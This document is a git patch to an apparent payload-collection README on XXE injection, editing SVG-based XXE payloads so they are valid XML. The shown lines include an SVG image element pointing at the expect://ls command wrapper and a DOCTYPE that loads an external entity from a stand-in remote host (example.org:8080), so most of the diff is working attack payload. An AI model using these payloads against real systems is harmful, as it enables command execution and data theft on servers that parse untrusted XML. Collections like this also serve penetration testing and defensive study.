From 43a9a5d235d02846c37984464da5c5c19a475175 Mon Sep 17 00:00:00 2001
From: gregxsunday <gregxsunday@gmail.com>
Date: Sat, 24 Apr 2021 14:45:45 +0200
Subject: [PATCH] improved XXE SVG payloads to be valid XMLs

---
 XXE Injection/README.md | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/XXE Injection/README.md b/XXE Injection/README.md
index 8607304..f46899f 100644
--- a/XXE Injection/README.md	
+++ b/XXE Injection/README.md	
@@ -419,7 +419,7 @@ From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79
 
 ```xml
 <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
-    <image xlink:href="expect://ls"></image>
+    <image xlink:href="expect://ls" width="200" height="200"></image>
 </svg>
 ```
 
@@ -438,6 +438,7 @@ From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79
 *xxe.svg*
 
 ```xml
+<?xml version="1.0" standalone="yes"?>
 <!DOCTYPE svg [
 <!ELEMENT svg ANY >
 <!ENTITY % sp SYSTEM "http://example.org:8080/xxe.xml">